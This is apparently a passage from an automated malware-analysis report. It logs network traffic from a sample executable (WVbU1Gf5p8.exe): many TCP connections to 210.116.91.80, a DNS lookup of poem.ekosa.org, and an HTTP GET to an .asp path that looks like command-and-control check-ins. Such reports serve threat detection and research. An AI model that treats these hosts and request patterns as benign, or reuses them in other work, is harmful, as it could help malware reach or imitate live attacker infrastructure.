      Jan 11, 2021 17:57:20.407540083 CET5002780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.667928934 CET8050027210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.668092012 CET5002780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.668296099 CET5002780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.674627066 CET5002880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.934117079 CET8050027210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.938344002 CET8050028210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.938509941 CET5002880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.939857006 CET5002880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.203788042 CET8050028210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:21.203974009 CET5002880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.204025030 CET5002880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.319210052 CET5002980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.467189074 CET8050028210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:21.589534044 CET8050029210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:21.589713097 CET5002980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.590358973 CET5002980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.861025095 CET8050029210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:21.862119913 CET5002980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.862303972 CET5002980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:21.865274906 CET5003080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.132302046 CET8050029210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.133224964 CET8050030210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.134124994 CET5003080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.137531996 CET5003080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.406336069 CET8050030210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.407227039 CET5003080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.407428026 CET5003080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.413650990 CET5003180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.673980951 CET8050031210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.674078941 CET5003180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.675158978 CET5003180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.675267935 CET8050030210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.936172962 CET8050031210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:22.936403036 CET5003180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:22.936634064 CET5003180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.054307938 CET5003280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.196711063 CET8050031210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:23.315829992 CET8050032210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:23.318089008 CET5003280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.319056988 CET5003280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.581068039 CET8050032210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:23.583781958 CET5003280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.584009886 CET5003280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.591613054 CET5003380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.845213890 CET8050032210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:23.858829021 CET8050033210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:23.859649897 CET5003380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:23.861730099 CET5003380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.129415989 CET8050033210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:24.129501104 CET5003380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.129601955 CET5003380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.133711100 CET5003480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.396053076 CET8050034210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:24.396166086 CET5003480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.396394014 CET8050033210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:24.396656990 CET5003480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.659502029 CET8050034210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:24.659734964 CET5003480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.660469055 CET5003480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.772429943 CET5003580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:24.922811031 CET8050034210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.034434080 CET8050035210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.034673929 CET5003580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.035551071 CET5003580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.298223972 CET8050035210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.298620939 CET5003580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.299190044 CET5003580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.304649115 CET5003680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.560678005 CET8050035210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.565469027 CET8050036210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.566350937 CET5003680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.567418098 CET5003680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.828813076 CET8050036210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:25.829266071 CET5003680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.829432011 CET5003680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:25.834501982 CET5003780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.089834929 CET8050036210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:26.093677044 CET8050037210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:26.094079971 CET5003780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.094739914 CET5003780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.354414940 CET8050037210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:26.354573965 CET5003780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.354670048 CET5003780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.478899002 CET5003880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.613559961 CET8050037210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:26.750530958 CET8050038210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:26.752520084 CET5003880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:26.753338099 CET5003880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.024575949 CET8050038210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.024835110 CET5003880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.025087118 CET5003880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.034399986 CET5003980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.295644045 CET8050038210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.298363924 CET8050039210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.298563004 CET5003980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.299591064 CET5003980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.564192057 CET8050039210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.564305067 CET5003980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.564474106 CET5003980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.568435907 CET5004080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.828164101 CET8050039210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.829572916 CET8050040210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:27.829860926 CET5004080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:27.832099915 CET5004080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.093781948 CET8050040210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.094825029 CET5004080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.095153093 CET5004080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.210186005 CET5004180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.356311083 CET8050040210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.469147921 CET8050041210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.469528913 CET5004180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.470154047 CET5004180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.729583979 CET8050041210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.729688883 CET5004180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.729821920 CET5004180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.736040115 CET5004280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.988543034 CET8050041210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.998671055 CET8050042210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:28.998862028 CET5004280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:28.999576092 CET5004280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.262648106 CET8050042210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:29.262790918 CET5004280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.265005112 CET5004280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.269448996 CET5004380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.527278900 CET8050042210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:29.533353090 CET8050043210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:29.534420967 CET5004380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.535096884 CET5004380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.799536943 CET8050043210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:29.800756931 CET5004380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.800981045 CET5004380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:29.937433004 CET5004480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.064647913 CET8050043210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.199404001 CET8050044210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.199558973 CET5004480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.203625917 CET5004480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.465909004 CET8050044210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.466042995 CET5004480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.466274977 CET5004480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.471905947 CET5004580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.727611065 CET8050044210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.733849049 CET8050045210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.735007048 CET5004580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.735768080 CET5004580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.998259068 CET8050045210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:30.998748064 CET5004580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:30.998893023 CET5004580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.002202988 CET5004680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.260814905 CET8050045210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:31.263509035 CET8050046210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:31.264242887 CET5004680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.264834881 CET5004680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.526848078 CET8050046210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:31.527337074 CET5004680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.527671099 CET5004680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.648883104 CET5004780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.788757086 CET8050046210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:31.911181927 CET8050047210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:31.911308050 CET5004780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:31.912024021 CET5004780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.174684048 CET8050047210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.179137945 CET5004780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.179263115 CET5004780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.183458090 CET5004880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.441108942 CET8050047210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.442712069 CET8050048210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.443151951 CET5004880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.447808027 CET5004880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.707947969 CET8050048210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.709605932 CET5004880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.709888935 CET5004880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.720355988 CET5004980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.969136000 CET8050048210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.990688086 CET8050049210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:32.991045952 CET5004980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:32.992369890 CET5004980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.263003111 CET8050049210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:33.263200998 CET5004980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.266567945 CET5004980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.385032892 CET5005080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.536602974 CET8050049210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:33.655575037 CET8050050210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:33.657726049 CET5005080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.658216000 CET5005080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.928900003 CET8050050210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:33.929498911 CET5005080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.930738926 CET5005080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:33.936300993 CET5005180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.199870110 CET8050051210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:34.200733900 CET8050050210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:34.201724052 CET5005180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.205075979 CET5005180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.469141006 CET8050051210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:34.471539021 CET5005180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.598129988 CET5005180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.602391958 CET5005280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.861500978 CET8050051210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:34.863835096 CET8050052210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:34.863956928 CET5005280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:34.868999004 CET5005280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:35.131473064 CET8050052210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:35.135453939 CET5005280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:35.465029001 CET5005280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:35.586373091 CET5005380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:35.726397991 CET8050052210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:35.849493980 CET8050053210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:35.850209951 CET5005380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:35.851495981 CET5005380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.114909887 CET8050053210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.115065098 CET5005380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.115148067 CET5005380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.119673014 CET5005480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.377733946 CET8050053210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.383586884 CET8050054210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.384381056 CET5005480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.384987116 CET5005480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.649343967 CET8050054210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.649934053 CET5005480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.650167942 CET5005480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.658442974 CET5005580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.913666010 CET8050054210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.915374041 CET8050055210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:36.915548086 CET5005580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:36.917159081 CET5005580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.174726009 CET8050055210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:37.176763058 CET5005580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.177030087 CET5005580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.292783976 CET5005680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.433588028 CET8050055210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:37.553716898 CET8050056210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:37.554105997 CET5005680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.555005074 CET5005680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.816874981 CET8050056210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:37.817044020 CET5005680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.817276001 CET5005680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:37.822151899 CET5005780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.078115940 CET8050056210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.084208965 CET8050057210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.084368944 CET5005780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.085321903 CET5005780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.348088026 CET8050057210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.348464966 CET5005780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.348684072 CET5005780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.356905937 CET5005880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.610536098 CET8050057210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.624557972 CET8050058210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.624762058 CET5005880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.628407001 CET5005880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.896718025 CET8050058210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:38.897169113 CET5005880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:38.897289991 CET5005880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.008595943 CET5005980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.164562941 CET8050058210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:39.278240919 CET8050059210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:39.278896093 CET5005980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.297255039 CET5005980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.567338943 CET8050059210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:39.567868948 CET5005980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.567991018 CET5005980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.572240114 CET5006080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.836896896 CET8050059210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:39.844100952 CET8050060210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:39.845024109 CET5006080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:39.845774889 CET5006080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.118158102 CET8050060210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:40.118340969 CET5006080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.118437052 CET5006080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.120975018 CET5006180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.383126020 CET8050061210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:40.383851051 CET5006180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.390117884 CET8050060210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:40.390743971 CET5006180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.653165102 CET8050061210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:40.654001951 CET5006180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.654196024 CET5006180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.775902987 CET5006280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:40.916074038 CET8050061210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.032679081 CET8050062210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.032780886 CET5006280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.034111977 CET5006280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.291224003 CET8050062210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.291543961 CET5006280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.291697979 CET5006280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.295624971 CET5006380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.548007965 CET8050062210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.555386066 CET8050063210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.555649996 CET5006380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.556370974 CET5006380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.816778898 CET8050063210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:41.817058086 CET5006380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.817318916 CET5006380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:41.823790073 CET5006480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.076993942 CET8050063210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:42.085009098 CET8050064210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:42.085371017 CET5006480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.086652040 CET5006480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.348958969 CET8050064210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:42.349092960 CET5006480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.350528955 CET5006480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.462131977 CET5006580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:42.611454010 CET8050064210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:42.728588104 CET8050065210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:42.728672981 CET5006580192.168.2.4210.116.91.80

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jan 11, 2021 17:54:50.327912092 CET5653453192.168.2.48.8.8.8
      Jan 11, 2021 17:54:50.375921965 CET53565348.8.8.8192.168.2.4
      Jan 11, 2021 17:54:51.456178904 CET5662753192.168.2.48.8.8.8
      Jan 11, 2021 17:54:51.507028103 CET53566278.8.8.8192.168.2.4
      Jan 11, 2021 17:54:52.859436989 CET5662153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:52.910554886 CET53566218.8.8.8192.168.2.4
      Jan 11, 2021 17:54:54.150439978 CET6311653192.168.2.48.8.8.8
      Jan 11, 2021 17:54:54.198148012 CET53631168.8.8.8192.168.2.4
      Jan 11, 2021 17:54:55.312558889 CET6407853192.168.2.48.8.8.8
      Jan 11, 2021 17:54:55.363318920 CET53640788.8.8.8192.168.2.4
      Jan 11, 2021 17:54:56.019773960 CET6480153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:56.400116920 CET53648018.8.8.8192.168.2.4
      Jan 11, 2021 17:54:56.479903936 CET6172153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:56.528000116 CET53617218.8.8.8192.168.2.4
      Jan 11, 2021 17:54:57.613356113 CET5125553192.168.2.48.8.8.8
      Jan 11, 2021 17:54:57.664556980 CET53512558.8.8.8192.168.2.4
      Jan 11, 2021 17:54:59.272258043 CET6152253192.168.2.48.8.8.8
      Jan 11, 2021 17:54:59.323074102 CET53615228.8.8.8192.168.2.4
      Jan 11, 2021 17:55:00.485110044 CET5233753192.168.2.48.8.8.8
      Jan 11, 2021 17:55:00.541618109 CET53523378.8.8.8192.168.2.4
      Jan 11, 2021 17:55:01.652298927 CET5504653192.168.2.48.8.8.8
      Jan 11, 2021 17:55:01.710850000 CET53550468.8.8.8192.168.2.4
      Jan 11, 2021 17:55:02.817600012 CET4961253192.168.2.48.8.8.8
      Jan 11, 2021 17:55:02.865578890 CET53496128.8.8.8192.168.2.4
      Jan 11, 2021 17:55:03.955786943 CET4928553192.168.2.48.8.8.8
      Jan 11, 2021 17:55:04.003793955 CET53492858.8.8.8192.168.2.4
      Jan 11, 2021 17:55:05.092745066 CET5060153192.168.2.48.8.8.8
      Jan 11, 2021 17:55:05.143625975 CET53506018.8.8.8192.168.2.4
      Jan 11, 2021 17:55:14.155049086 CET6087553192.168.2.48.8.8.8
      Jan 11, 2021 17:55:14.206022978 CET53608758.8.8.8192.168.2.4
      Jan 11, 2021 17:55:18.857247114 CET5644853192.168.2.48.8.8.8
      Jan 11, 2021 17:55:18.915152073 CET53564488.8.8.8192.168.2.4
      Jan 11, 2021 17:55:30.622966051 CET5917253192.168.2.48.8.8.8
      Jan 11, 2021 17:55:30.697223902 CET53591728.8.8.8192.168.2.4
      Jan 11, 2021 17:55:40.183861971 CET6242053192.168.2.48.8.8.8
      Jan 11, 2021 17:55:40.242363930 CET53624208.8.8.8192.168.2.4
      Jan 11, 2021 17:55:40.341576099 CET6057953192.168.2.48.8.8.8
      Jan 11, 2021 17:55:40.389503956 CET53605798.8.8.8192.168.2.4
      Jan 11, 2021 17:55:49.522109032 CET5018353192.168.2.48.8.8.8
      Jan 11, 2021 17:55:49.569937944 CET53501838.8.8.8192.168.2.4
      Jan 11, 2021 17:55:50.181818008 CET6153153192.168.2.48.8.8.8
      Jan 11, 2021 17:55:50.255687952 CET53615318.8.8.8192.168.2.4
      Jan 11, 2021 17:55:52.533818007 CET4922853192.168.2.48.8.8.8
      Jan 11, 2021 17:55:52.594717979 CET53492288.8.8.8192.168.2.4
      Jan 11, 2021 17:56:24.092113018 CET5979453192.168.2.48.8.8.8
      Jan 11, 2021 17:56:24.142743111 CET53597948.8.8.8192.168.2.4
      Jan 11, 2021 17:56:25.992212057 CET5591653192.168.2.48.8.8.8
      Jan 11, 2021 17:56:26.048433065 CET53559168.8.8.8192.168.2.4

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Jan 11, 2021 17:54:56.019773960 CET192.168.2.48.8.8.80x86a6Standard query (0)poem.ekosa.orgA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Jan 11, 2021 17:54:56.400116920 CET8.8.8.8192.168.2.40x86a6No error (0)poem.ekosa.org210.116.91.80A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • poem.ekosa.org

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.449756210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:56.689865112 CET77OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
